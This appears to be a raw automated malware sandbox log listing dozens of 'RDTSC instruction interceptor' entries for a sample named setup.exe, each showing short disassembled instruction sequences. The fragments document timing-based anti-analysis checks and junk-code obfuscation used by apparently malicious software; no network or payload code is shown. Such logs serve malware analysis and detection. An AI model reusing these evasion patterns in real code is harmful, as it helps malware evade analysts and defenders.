Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3E52B second address: E3E567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FF32CFB71FEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FF32CFB7202h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 jnp 00007FF32CFB7202h 0x0000001e ja 00007FF32CFB71FCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3E665 second address: E3E66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3EA3D second address: E3EA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3EA43 second address: E3EA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F0AE second address: E3F0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F0B7 second address: E3F0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F182 second address: E3F186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F2EA second address: E3F2F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F5D3 second address: E3F5D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F5D7 second address: E3F5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3F5DD second address: E3F626 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FF32CFB71F8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 movsx esi, si 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007FF32CFB7206h 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 pop edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E41D07 second address: E41D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E42454 second address: E4245A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4245A second address: E42460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E42460 second address: E42464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E44280 second address: E44286 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E44286 second address: E44290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF32CFB71F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E44290 second address: E442F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FF32CDD656Bh 0x00000010 jmp 00007FF32CDD6572h 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+1246ED0Ch], ecx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FF32CDD6568h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D1C24h], ebx 0x00000040 sub di, 5FBFh 0x00000045 xchg eax, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E442F6 second address: E442FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E46012 second address: E46016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E49048 second address: E49050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4AC52 second address: E4AC6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF32CDD656Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4AC6C second address: E4AD06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB7202h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FF32CFB71F8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 call 00007FF32CFB7206h 0x0000002c sbb bx, 52BFh 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12460B16h], ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FF32CFB71F8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 jng 00007FF32CFB71F8h 0x0000005c mov bl, 0Dh 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 jnl 00007FF32CFB71F8h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4DBB0 second address: E4DBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4CDFA second address: E4CE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4CF0B second address: E4CF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FCD6 second address: E4FCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF32CFB71F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FCE0 second address: E4FD4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF32CDD6573h 0x0000000e nop 0x0000000f pushad 0x00000010 mov esi, 520426D3h 0x00000015 call 00007FF32CDD6573h 0x0000001a mov dword ptr [ebp+12460B16h], edi 0x00000020 pop ecx 0x00000021 popad 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+124610CAh], edx 0x0000002a push 00000000h 0x0000002c jns 00007FF32CDD6566h 0x00000032 jnl 00007FF32CDD656Bh 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007FF32CDD6571h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FE41 second address: E4FE47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E4FE47 second address: E4FE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF32CDD6566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E51D05 second address: E51D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF32CFB71FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E52E67 second address: E52E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CDD6574h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E52E82 second address: E52E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E53F2D second address: E53F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E53F32 second address: E53F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E55005 second address: E55076 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007FF32CDD6566h 0x0000000d pop eax 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF32CDD6568h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e sub ebx, dword ptr [ebp+122D26A2h] 0x00000034 mov bx, B540h 0x00000038 push 00000000h 0x0000003a mov di, 2F00h 0x0000003e xchg eax, esi 0x0000003f jbe 00007FF32CDD6574h 0x00000045 push eax 0x00000046 jg 00007FF32CDD6581h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF32CDD656Fh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E55076 second address: E5507A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E51F22 second address: E51FD4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6576h 0x00000008 jmp 00007FF32CDD6570h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 cld 0x00000013 mov di, FC51h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov edi, dword ptr [ebp+122D32D3h] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FF32CDD6568h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 call 00007FF32CDD656Fh 0x0000004a mov ebx, dword ptr [ebp+122D30C0h] 0x00000050 pop edi 0x00000051 mov eax, dword ptr [ebp+122D0F39h] 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007FF32CDD6568h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 0000001Ch 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 mov bx, dx 0x00000074 push FFFFFFFFh 0x00000076 je 00007FF32CDD656Ch 0x0000007c sub ebx, dword ptr [ebp+122D2BBFh] 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007FF32CDD656Ch 0x0000008a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E56033 second address: E56038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E56038 second address: E56091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF32CDD6566h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FF32CDD6568h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000000h 0x0000002a adc di, 19A0h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FF32CDD6568h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c push ecx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5526D second address: E55271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E57011 second address: E57040 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FF32CDD6577h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF32CDD656Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FFE6 second address: E5FFF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FB87 second address: E5FB97 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FB97 second address: E5FB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FB9D second address: E5FBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FBA1 second address: E5FBB5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF32CFB71FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FBB5 second address: E5FBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E5FBC0 second address: E5FBC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63110 second address: E63137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6575h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FF32CDD6568h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63137 second address: E6313D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6313D second address: E63165 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jmp 00007FF32CDD6576h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63165 second address: E6318B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FF32CFB7204h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63291 second address: E6329C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF32CDD6566h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633D0 second address: E633D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633D4 second address: E633D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633D8 second address: E633E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FF32CFB71F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633E7 second address: E633FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF32CDD656Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E633FC second address: E6343A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF32CFB7209h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jng 00007FF32CFB71FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6343A second address: E63451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FF32CDD6570h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63451 second address: E63484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FF32CFB7200h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF32CFB7203h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E63484 second address: E6349C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6574h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E648C4 second address: E648E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7205h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DF22DD second address: DF22E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6CEEE second address: E6CEF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6DA5C second address: E6DA62 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6DA62 second address: E6DAA9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF32CFB71F8h 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FF32CFB71FAh 0x00000015 jmp 00007FF32CFB7201h 0x0000001a jmp 00007FF32CFB7206h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E6DAA9 second address: E6DAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E72849 second address: E7284F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7284F second address: E7286F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CDD6566h 0x00000008 jmp 00007FF32CDD656Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8C5 second address: DFA8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8D0 second address: DFA8D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8D4 second address: DFA8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DFA8DA second address: DFA8DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3CE6A second address: E3CE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3CE6E second address: E1FA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FF32CDD6568h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+122D3504h] 0x0000002a lea eax, dword ptr [ebp+12481B8Bh] 0x00000030 xor edx, dword ptr [ebp+122D35A0h] 0x00000036 mov di, 14FDh 0x0000003a nop 0x0000003b jmp 00007FF32CDD6572h 0x00000040 push eax 0x00000041 ja 00007FF32CDD656Ah 0x00000047 push esi 0x00000048 pushad 0x00000049 popad 0x0000004a pop esi 0x0000004b nop 0x0000004c clc 0x0000004d call dword ptr [ebp+122D2BBFh] 0x00000053 push edi 0x00000054 jmp 00007FF32CDD6570h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3CF65 second address: E3CF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D303 second address: E3D309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D309 second address: E3D30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D3A5 second address: E3D3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF32CDD6566h 0x0000000a rdtsc
